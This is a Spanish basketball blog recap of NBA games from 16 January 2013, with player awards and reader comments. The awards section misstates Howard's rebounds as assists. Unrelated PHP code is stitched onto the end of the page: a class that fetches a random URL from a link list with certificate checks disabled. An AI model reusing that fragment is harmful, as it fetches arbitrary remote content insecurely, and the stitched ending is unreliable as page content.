La Crónica: Supermán al rescate

16 de January de 2013 por Pop

Anoche vimos la mejor versión de la temporada de Dwight Howard, quien con 31 puntos (14 de 18 en tiros de 2), 16 rebotes y 4 tapones asoló  la zona en la victoria de los Lakers ante Milwaukee (88-104). Kobe sólo necesitó 19 lanzamientos para irse hasta los 31 puntos y estuvo además férreo en la defensa perimetral, mientras que Nash dirigió bien a su equipo con 11 asistencias. En cambio, la pareja Jennings/Ellis estuvo nefasta en el tiro. Entre ambos anotaron sólo 10 canastas de 30 intentos y ellos tienen demasiado peso en los Bucks como para que su equipo no lo note. El triunfo de los Lakers supone la victoria número 400 en la carrera de D’Antoni como entrenador.

En uno de los duelos de alto nivel en el oeste, la ausencia de Chris Paul, con molestias en una rodilla, no se notó en los Clippers. La franquicia angelina derrotó a los Rockets merced sobre todo a un parcial de 32-18 en el tercer cuarto que fue insalvable para los locales (117-109). Enorme actuación de un Jamal Crawford que sigue postulándose para el trofeo al mejor 6º hombre, bien acompañado por Griffin y Bledsoe. Por parte de Houston, que sigue en horas bajas en su peor racha de la temporada, volvió a destacar Harden con 24 puntos. Como dato para el recuerdo, Grant Hill se unió anoche al selecto club de jugadores con 1000 partidos o más en la NBA. 

En la otra batalla del oeste, bonito partido el vivido anoche en Denver con prórroga incluída. Los Nuggets siguen demostrando ser uno de los equipos más en forma de la competición y su racha de victorias se amplía ya a 6. Lawson se fue a los 24 puntos y 12 asistencias, Faried colaboró con 21 puntos y 11 rebotes y Gallinari puso la guinda con otros 25 puntazos. Los Blazers contaron con una gran actuación de su quinteto titular, sobre todo de mano de Aldridge (28 puntos, 8 rebotes y 6 asistencias), pero sólo consiguieron 12 puntos desde el banco. Wilson Chandler anotó el triple decisivo en la prórroga para Denver (111-115).

En Toronto, los Nets aumentaron a 7 su racha de victorias y permanecen invictos en lo que va de 2013. Entre Deron, Johnson y Brook Lopez anotaron 64 puntos contra los que sucumbieron los Raptors, que sólo maquillaron el marcador final (113-106) gracias al extraordinario último cuarto de Lowry, que se las apañó para anotar 19 de sus 21 puntos (en 15 minutos) en este periodo.

La presencia por primera vez esta temporada en la cancha de los Bobcats de Michael Jordan no fue talismán para su equipo, que sigue en caída libre tras su esperanzador inicio de temporada y padecen su 5ª derrota consecutiva. Esta vez fue ante los potentes Pacers (103-76), que les apalizaron  desde el rebote (60-31) y contaron con todo el equipo bien implicado, pudiendo hacer un reparto cómodo de minutos. Charlotte no llegó al 35% en tiros de campo.

Finalmente, Greivis Vasquez con 23 puntos y 9 asistencias, bien secundado por Gordon (19 puntos), lideró la victoria de los Hornets en Philadelphia (111-99), donde sólo Holiday consiguió estar a la altura en un encuentro marcado por el acierto exterior de ambos equipos. Los 76ers esperan la llegada de Bynum como si del mesías se tratase.

PREMIOS

MVP: Dwight Howard y Kobe Bryant se mostraron imparables ante los Bucks. El primero acabó con 31 puntos, 16 asistencias y 4 tapones y el segundo, con 31 puntos y 6 asistencias.

Rookie: 16 puntos, 8 rebotes, 5 asistencias, 2 tapones y 1 robo para Damian Lillard que sigue con paso firme hacia el título de Rookie del año. El a priori favorito, Anthony Davis, se quedó en 10 puntos, 7 rebotes, 2 tapones y 2 robos.

Sorpresa: Landry Fields no está teniendo una buena temporada tras llegr a Toronto pero anoche disputó uno de sus mejores partidos del año con 8 puntos, 11 rebotes, 5 asistencias y 2 robos.

Decepción: Andre Iguodala no ha sido llamado por el Señor al camino del acierto. No se le da muy bien pero lo de ayer fue escandaloso: 4 de 16 en tiros de campo y 0 de 3 en tiros libres.

Esfuerzo en vano: Otra exbición de Jrue Holiday que no es suficiente para llevar a su equipo a la victoria. El base de los Sixers anotó 29 puntos, repartió 11 asistencias, pilló 5 rebotes y robó 4 balones. Partidazo en toda regla.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

11 comentarios a esta entrada

  1. oli dice:
    #1

    Por fin Howard empieza a demostrar lo que puede dar, haber si se repiten como este más a menudo,y si se consigue involucrar a Gasol todavía mejor, y podría siginicar un cambio en el juego que les pueda servir para clasificarse para playoffs!!

      Citar

  2. Denise dice:
    #2

    Holiday debe ir al All-Star, para mi, el mejor base tras Paul en este tramo de la temporada. Vasques tambien tendría sus opciones si los Hornets no tuvieran un balance tan desastroso y fuera chino.

    Iguodala no es un jugador util en el sistema coral de Nuggets. Yo lo pondría en el mercado y escucharía ofertas. Creo que a los Nuggets le vendría mejor un jugador del estilo Mathews o Dudley.

      Citar

  3. txusma dice:
    #3

    Bueno, yo creo que Iguodala va muy bien en el juego coral de los Nuggets. Aporta en todos los apartados y mucha parte del juego pasa por sus manos. El problema es hacerle ver que no ha de tirar más de 10 veces por noche (y creo q soy generoso). Está en los peores porcentajes de toda su carrera.

      Citar

  4. Denise dice:
    #4

    txusma: Bueno, yo creo que Iguodala va muy bien en el juego coral de los Nuggets. Aporta en todos los apartados y mucha parte del juego pasa por sus manos. El problema es hacerle ver que no ha de tirar más de 10 veces por noche (y creo q soy generoso). Está en los peores porcentajes de toda su carrera.

    Eso es lo malo, que como le dices a un tio que tiene contrato y caché de jugador franquicia que tire menos de 10 tiros, especialmente que no tire de fuera, y que en los minutos calientes no asuma el rol de lider. El hombre tendrá su orgullo y querrá demostrar lo que vale.

      Citar

  5. Esteban dice:
    #5

    los HORNETS empiezan a ver que el nucleo que tienen no solo tienen futuro sino tambien presente, van 6-2 desde que juega GORDON, pareciendose bastante a los que eramos optimistas con su temporada, una pena la salud de cristal de GORDON, sino habria que ser muy optimistas con ellos

    en su 5 inicial, saltan vazquez-gordon-aminu-davis-lopes, UNO MAS JOVEN QUE EL OTRO, todos con contratos bajos y asumibles (si gordon sigue jugando asi su contrato parecera una ganga), a esto hayq eu sumarle a un joven Ryan Anderson con un contrato acorde desde el banco y la potencialidad de IRVERS como sexto hombre, veo cosas muy muy positivas alli

    tendran millonadas en espacio a fin de esta temporada, quiza si log asten bien pueden ser un equipo de PO la proxima temporada

      Citar

  6. Esteban dice:
    #6

    parrafo aparte merece FRANK VOGEL, quiza alguno nisiquiera lo ha oido nombrar pero este entrenadro se las trae

    hace practicamente dos año tome las riendas que dejo o´brien en los pacers, un equipo con años si entrar a PO, veterano y realmente sin mucho futuro
    ese mismo año logro clasificarse a PO, dandole la confianza nacesaria a un tio llamado PAUL GEORGE, y apostando fuertemente por aquel entonces por collison y Hansbrough, y relegando a t.j. ford, mcroberts y dunleavy

    el año paado logro un balance genial, clasifico a segunda ronda y le dieron batalla al HEAT, ganadole dos juegos en una serie durisima

    este parecia el año que se cortaban los festejos, la lesion de granger el mejor jugador ofensivo del equipo, uno de los pocos capaces de generarse su tiro no jugaria, sumado al achanchamiento de HIBBERT tras su contrato, parecia que el infierno llegaba a indiana, PERO NO FUE ASI

    vogel de alguna manera se las arreglo para armar un equipo muy solido, no solo competitivo, sino que candidato, si granger vuelve y se presta a jugar de sexto hombre, mucho cuidado con ellos

    hoy estan 24-15 y esta noche se enfrentan a un debil orlando, lo que los podria dejar a los 25-15, quien lo diria no?

      Citar

  7. HisRoyalAirness dice:
    #7

    Denise:
    Holiday debe ir al All-Star, para mi, el mejor base tras Paul en este tramo de la temporada. Vasques tambien tendría sus opciones si los Hornets no tuvieran un balance tan desastroso y fuera chino.

    Iguodala no es un jugador util en el sistema coral de Nuggets. Yo lo pondría en el mercado y escucharía ofertas. Creo que a los Nuggets le vendría mejor un jugador del estilo Mathews o Dudley.

    Y Parker? Para mí Parker por encima de cualquiera

      Citar

  8. GreenPride dice:
    #8

    Anoche vi el Rockets-Clippers…. y como están los Clips. Equipo profundísimo que hasta sin CP3 tienen muchas maneras de hacerte daño. Durante dos cuartos pareció un partido igualado pero luego Crawford se puso a martillear desde cualquier sitio, Barnes a aprovechar cada despiste y todos a defender y echaron a los Rockets de la pista en un visto y no visto. Candidatos clarísimos al anillo si no tienen lesiones importantes, hasta Grant Hill recién llegado rinde con defensa, rebotes y alguna buena canasta. Por los Rockets, un equipo divertido que juega fácil pero que ante rivales en condiciones tiene pocas armas y poca defensa como para dar guerra. Creo que van a tener una segunda parte de la temporada dura una vez pasado su magnífico inicio.
    Y los Lakers sumaron una buena victoria, con Howard por fin dando lo que debe. Ahora el calendario vuelve a ponerse complicado, vamos a ver cómo responden a los próximos partidos

      Citar

  9. Sempren dice:
    #9

    Ojo con la vuelta de Chandler en los Nuggets, les hace ser un equipo bastante más profundo y peligroso, y aunque Gallo de 4 es en parte un arma de doble filo, así solventan su falta de un PF anotador como era Harrington.
    El problema de Iguodala ya no solo son los tiros fallados desde fuera sin una posición clara, sino que lleva una racha en los tiros libres que es acojonante, probablemente sea de lo peor en esa faceta de los más pagados, incluyendo pivots. Recuerdo que la crónica de Tjnba daba como una clave de la derrota contra los Wolves el problema en los libres, por un 11-20 o algo así, que incluía un 1 de 6 de Iguodala; con esos puntos sería un porcentaje normal y la victoria estaría ahí.
    Pero en fin, ya sabemos como es André.

    Respecto a los Pacers, según el dato que puso hoy Gonzalo Vázquez en twitter, Pacers son el mejor equipo en eficiencia defensiva de la NBA, y en los 39 partidos que llevan, en 22 dejaron a su rival por debajo de 90 puntos y en 8 por debajo de 80. Impresionante. Yo los veía y pensaba que les faltaba banca para las posiciones exteriores, especialmente viendo las cifras anotadoras (salvo partidos aislados de Gerald Green), pero si estos le ponen una intensidad defensiva extra… muy bien por ellos y, como dice Esteban, por Vogel

      Citar

  10. MagicJohnson32 dice:
    #10

    HisRoyalAirness: Y Parker? Para mí Parker por encima de cualquiera

    Es increíble que se siga infravalorando a TP de esta manera.

      Citar

  11. HisRoyalAirness dice:
    #11

    MagicJohnson32: Es increíble que se siga infravalorando a TP de esta manera.

    Agree

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>